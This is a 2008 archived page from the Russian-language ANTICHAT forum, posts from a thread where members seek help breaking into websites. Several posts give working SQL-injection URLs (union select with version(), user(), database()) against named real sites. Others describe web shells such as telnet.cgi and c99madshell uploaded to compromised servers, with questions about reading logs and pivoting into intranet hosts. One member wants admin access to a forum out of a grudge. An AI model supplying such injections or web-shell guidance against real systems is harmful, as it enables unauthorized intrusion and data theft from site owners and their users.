HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3011  
Старый 19.08.2008, 13:10
Elephant
Новичок
Регистрация: 31.07.2008
Сообщений: 11
Провел на форуме:
39796

Репутация: -3
Отправить сообщение для Elephant с помощью ICQ Отправить сообщение для Elephant с помощью MSN Отправить сообщение для Elephant с помощью Yahoo
По умолчанию

Я просто прошу помощи, и читать я умею, EX me, просто админ ОЧЕНЬ плохой человек, но раз по IP админка, проксик не помогает, то как быть, как получить доступ то? сплоитов под форум тоже нету, по крайней мере не в привате
 
Ответить с цитированием

  #3012  
Старый 19.08.2008, 15:04
sher_or_wer
Новичок
Регистрация: 13.08.2008
Сообщений: 6
Провел на форуме:
27688

Репутация: 0
По умолчанию

Спасибо за помощь BlackSun. На сервер залил telnet.cgi. Но вот тема какая я с командной строкой тяжело общаюсь пока. Я полазил по серверу доступ увеличился чуть-чуть, но я незнаю где можно посмотреть логи и т.д. и т.п. посоветуйте плиз или ссылку дайте буду очень благодарен.


Да и кстати мне интересно кто-нидь когда-нидь писал руководства к шеллам или все начинающие методом тыка пользуется, если есть ссылки дайте плиз, а то шеллов много а какие для чего понятия не имею.

Последний раз редактировалось sher_or_wer; 19.08.2008 в 15:08..
 
Ответить с цитированием

  #3013  
Старый 19.08.2008, 15:28
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию

http://trinitysquarevideo.com/exhibition.php?id=%27
помогите разобраться, на разные запросы никак не реагирует, по моему фильтрация какая то.как её обойти?
 
Ответить с цитированием

  #3014  
Старый 19.08.2008, 15:39
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Просто не ставь в конце /*
http://trinitysquarevideo.com/exhibition.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10
 
Ответить с цитированием

  #3015  
Старый 19.08.2008, 16:56
Elephant
Новичок
Регистрация: 31.07.2008
Сообщений: 11
Провел на форуме:
39796

Репутация: -3
Отправить сообщение для Elephant с помощью ICQ Отправить сообщение для Elephant с помощью MSN Отправить сообщение для Elephant с помощью Yahoo
По умолчанию

Плохо разбираюсь в MSSQL+asp что эт за ошибка, и есть ли тут уязвимость?

_http://www.itouch.ru/price.asp?r=261'
 
Ответить с цитированием

  #3016  
Старый 19.08.2008, 17:24
Elephant
Новичок
Регистрация: 31.07.2008
Сообщений: 11
Провел на форуме:
39796

Репутация: -3
Отправить сообщение для Elephant с помощью ICQ Отправить сообщение для Elephant с помощью MSN Отправить сообщение для Elephant с помощью Yahoo
По умолчанию

Цитата:
Сообщение от sher_or_wer  
Спасибо за помощь BlackSun. На сервер залил telnet.cgi. Но вот тема какая я с командной строкой тяжело общаюсь пока. Я полазил по серверу доступ увеличился чуть-чуть, но я незнаю где можно посмотреть логи и т.д. и т.п. посоветуйте плиз или ссылку дайте буду очень благодарен.


Да и кстати мне интересно кто-нидь когда-нидь писал руководства к шеллам или все начинающие методом тыка пользуется, если есть ссылки дайте плиз, а то шеллов много а какие для чего понятия не имею.

используй c99madshell, только для начала в через блокнот открой и впиши логин и пасс, или r57shell а руководство мало кто делает, да и то если только для себя в качестве перевода
 
Ответить с цитированием

  #3017  
Старый 19.08.2008, 18:17
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Цитата:
Сообщение от Elephant  
Плохо разбираюсь в MSSQL+asp что эт за ошибка, и есть ли тут уязвимость?

_http://www.itouch.ru/price.asp?r=261'
Нету здесь скули

Последний раз редактировалось Shaitan-Devil; 19.08.2008 в 18:30..
 
Ответить с цитированием

  #3018  
Старый 19.08.2008, 20:08
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

http://gta.co.ua/file_sa_details.phtml?id=-1+union+select+1,2,3,4,5,6,7,user(),database(),ver sion(),11,12,13,14,15,16,17,18,19,20/*
 
Ответить с цитированием

через сервер с c99madshell - на http ресурсы интранета
  #3019  
Старый 19.08.2008, 23:38
fervex
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633

Репутация: 3
По умолчанию через сервер с c99madshell - на http ресурсы интранета

Здравствуйте!

Подскажите:

залил c99madshell на сервер, этот сервер входит в интранет, где есть другие серверы, на которые из интранета можно попасть по http://, а из интернета - нельзя.

Подскажите, есть ли какой-нибудь броузер на php, которые можно было бы залить на сервер и через этот броузер уже от имени сервера (IP) заходить на другие сервера интранета?

Или как-то ещё можно попасть на http интранета?


Спасибо!
 
Ответить с цитированием

  #3020  
Старый 20.08.2008, 00:22
sher_or_wer
Новичок
Регистрация: 13.08.2008
Сообщений: 6
Провел на форуме:
27688

Репутация: 0
По умолчанию

Остальные шеллы не дают просматривать папки к которым я якобы имею доступ, но telnet.cgi даёт, но увы только через командную строку. Может кто знает аналоги его, но более усовершенственные.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ